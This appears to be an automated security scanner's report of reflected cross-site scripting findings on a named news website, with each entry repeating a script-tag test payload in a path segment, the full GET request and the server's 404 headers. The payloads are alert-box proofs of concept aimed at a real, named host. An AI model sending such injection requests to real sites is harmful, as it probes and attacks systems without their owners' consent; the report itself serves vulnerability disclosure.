The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc361<script>alert(1)</script>a933244502c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigcc361<script>alert(1)</script>a933244502c/WebPortal/nypost/scripts/dropmenu.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:45 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1fef0<script>alert(1)</script>944434f9cf0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal1fef0<script>alert(1)</script>944434f9cf0/nypost/scripts/dropmenu.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:46 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 74a05<script>alert(1)</script>4e46e99c1f6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost74a05<script>alert(1)</script>4e46e99c1f6/scripts/dropmenu.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:48 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 43166<script>alert(1)</script>ecf756f6b93 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts43166<script>alert(1)</script>ecf756f6b93/dropmenu.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:50 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9e4d9<script>alert(1)</script>01dd039d6e0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js9e4d9<script>alert(1)</script>01dd039d6e0 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:53 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e0f5<script>alert(1)</script>47c9fe2342 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig2e0f5<script>alert(1)</script>47c9fe2342/WebPortal/nypost/scripts/facebox/facebox.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:42 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44aaa<script>alert(1)</script>5c1b9ffba5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal44aaa<script>alert(1)</script>5c1b9ffba5f/nypost/scripts/facebox/facebox.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:44 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4dab<script>alert(1)</script>a55b4d1622d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nyposte4dab<script>alert(1)</script>a55b4d1622d/scripts/facebox/facebox.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:46 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 60e14<script>alert(1)</script>95992cc8016 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts60e14<script>alert(1)</script>95992cc8016/facebox/facebox.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:47 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1e955<script>alert(1)</script>13e9840f8e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/facebox1e955<script>alert(1)</script>13e9840f8e3/facebox.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:49 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 996bb<script>alert(1)</script>a7dab6d0334 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js996bb<script>alert(1)</script>a7dab6d0334 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:52 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe6c8<script>alert(1)</script>ee4c6367be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigfe6c8<script>alert(1)</script>ee4c6367be9/WebPortal/nypost/scripts/jquery-ui-tabs.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:36 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1aca5<script>alert(1)</script>eaa7d7535d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal1aca5<script>alert(1)</script>eaa7d7535d7/nypost/scripts/jquery-ui-tabs.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:37 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a36ef<script>alert(1)</script>d7a4ed15351 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nyposta36ef<script>alert(1)</script>d7a4ed15351/scripts/jquery-ui-tabs.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:39 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28f46<script>alert(1)</script>ffe21bb34fa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts28f46<script>alert(1)</script>ffe21bb34fa/jquery-ui-tabs.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:40 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c836b<script>alert(1)</script>a7b055dba2a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.jsc836b<script>alert(1)</script>a7b055dba2a HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:42 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4e88<script>alert(1)</script>3cef0b5eed2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigd4e88<script>alert(1)</script>3cef0b5eed2/WebPortal/nypost/scripts/jquery.corner.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:41 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 45a44<script>alert(1)</script>b7bd4f60237 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal45a44<script>alert(1)</script>b7bd4f60237/nypost/scripts/jquery.corner.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:42 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52ab5<script>alert(1)</script>9686bc16743 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost52ab5<script>alert(1)</script>9686bc16743/scripts/jquery.corner.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:44 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ab38e<script>alert(1)</script>e81cd93691a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scriptsab38e<script>alert(1)</script>e81cd93691a/jquery.corner.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:46 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 91107<script>alert(1)</script>1453046d0a8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js91107<script>alert(1)</script>1453046d0a8 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:48 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 85a3a<script>alert(1)</script>ced33095086 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig85a3a<script>alert(1)</script>ced33095086/WebPortal/nypost/scripts/jquery.dimensions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:38 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d789f<script>alert(1)</script>06b4249b6a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortald789f<script>alert(1)</script>06b4249b6a1/nypost/scripts/jquery.dimensions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:39 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3000d<script>alert(1)</script>ade5b2dc97 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost3000d<script>alert(1)</script>ade5b2dc97/scripts/jquery.dimensions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:41 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39730<script>alert(1)</script>fee20a13f35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts39730<script>alert(1)</script>fee20a13f35/jquery.dimensions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:43 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4ad25<script>alert(1)</script>b1cb575786a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js4ad25<script>alert(1)</script>b1cb575786a HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:45 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e3f8<script>alert(1)</script>a21161b9192 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig7e3f8<script>alert(1)</script>a21161b9192/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:39 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e54f<script>alert(1)</script>a273c2c2869 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal2e54f<script>alert(1)</script>a273c2c2869/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:40 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d29de<script>alert(1)</script>e1697fc8c9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostd29de<script>alert(1)</script>e1697fc8c9e/scripts/jquery.jcarousel.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:42 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ca2e6<script>alert(1)</script>b68c9681711 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scriptsca2e6<script>alert(1)</script>b68c9681711/jquery.jcarousel.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:44 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 90378<script>alert(1)</script>c769dcef57d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
